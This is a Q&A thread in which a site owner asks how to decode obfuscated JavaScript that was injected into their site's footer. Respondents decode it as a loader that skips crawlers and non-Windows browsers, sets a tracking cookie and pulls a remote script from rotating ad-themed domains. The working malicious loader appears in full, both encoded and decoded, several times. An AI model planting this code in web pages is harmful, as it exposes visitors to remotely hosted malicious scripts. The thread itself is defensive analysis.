tags:

views:

105

answers:

9
+3  Q: 

Decode some injected Javascript?

I had the following injected into the footer of a site of mine and, in an effort of solving the greater mystery ("How" it happened), I'm trying to decode it. Any ideas?

Here's the code:

<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>
+4  A: 

You can decode the string using this tool. Set string conversion options to URL and Decode. Then you can pretty it up with js beautifier.

And because I'm a curious sort, I took a look at the output. It's writing a new caption.js file to your pages from a semi-random domain. There are 2 arrays of URL segments that are used to build the full domain, so I'd say you've got something to go with.

Pat  2010-08-02 20:52:06
Thank you for the references and taking a closer look! I appreciate it!
Jonathan Wold  2010-08-05 03:23:53
+1  A: 

All of those numbers are hexadecimal values for ASCII characters. When unescape is called they get turned into real characters. e.g. %3C is '<'.

Why not use a message box to display the output of unescape(...)

Matt Breckon  2010-08-02 20:52:52
+5  A:  
<script language="javascript" type="text/javascript">
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
</script>

So, prepends a subdomain from e (e.g. vagi.) to a domain name from d (e.g. myads.name) and loads a script from /system/caption.js at that domain (e.g. http://vagi.myads.name/system/caption.js).

Jordan  2010-08-02 20:53:00
Thank you for code sample and explanation.
Jonathan Wold  2010-08-05 03:23:25
+1  A: 

You can use the hex decoder here: http://home2.paulschou.net/tools/xlate/ The code is 

<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"&gt;&lt;\/script&gt;')};&lt;/script&gt;
Stealth-  2010-08-02 20:54:02
+1  A:  
<script language="javascript" type="text/javascript">
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; 
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],
    e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";
expires="+dt.toGMTString()+";
path=/";
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"&gt;&lt;\/script&gt;')};
</script>
Borealid  2010-08-02 20:54:07
+1  A: 

Here's a URLDecoder: http://meyerweb.com/eric/tools/dencoder/

And the code it writes:

<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"&gt;&lt;\/script&gt;')};&lt;/script&gt;

OK, so that's not too helpful. It appears to insert another JS file if the user doesn't have a cookie named "holycookie" and isn't the google bot. Most of that is just junk to pick which domain name to get the payload from.

 2010-08-02 20:54:33
+2  A:  
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};

code is loading a random subdomain-sld combo with a cookie set, to load unsecure content.

Rixius  2010-08-02 20:55:07
+1  A: 
emaster70  2010-08-02 21:04:55
A: 

Used php function rawurldecode 

   <script language="javascript" type="text/javascript">
    var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
    if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
    dt=new Date;
    dt.setTime(dt.getTime()+9072E4);
    document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; 
    document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"&gt;&lt;\/script&gt;')};
    </script>
Wifi Cordon  2010-08-02 21:17:29

related questions

What JavaScript patterns do you use most?
Javascript events
What style do you use for creating an "class" in JavaScript?
Graphing JavaScript Library
What's the difference in closure style
Getting the text from a drop-down box
How to specify javascript to run when ModalPopupExtender is shown
Length of Javascript Associative Array
How Do I Post and then redirect to an external URL from ASP.Net?
How to set up a CSS switcher in ASP.NET
Wrapping lists into columns
Javascript keyboard events primer? (or rather: help me with my custom dropdown)
Http Auth in a Firefox 3 bookmarklet
Best Debugging Tools for JavaScript/xulrunner Development
How can I turn a string of HTML into a DOM object in a Firefox extension?
Call ASP.NET Function From Javascript?
Javascript troubleshooting tools in IE
MAC addresses in JavaScript
Capturing TAB key in text box
CSS Background Color in Javascript
How can I make the browser see CSS and Javascript changes?
Triple Quotes? How do I delimit a databound Javascript string parameter in ASP.NET?
ASP .Net Custom Client-Side Validation
What JavaScript library would you choose for a new project and why?
Detecting font in JavaScript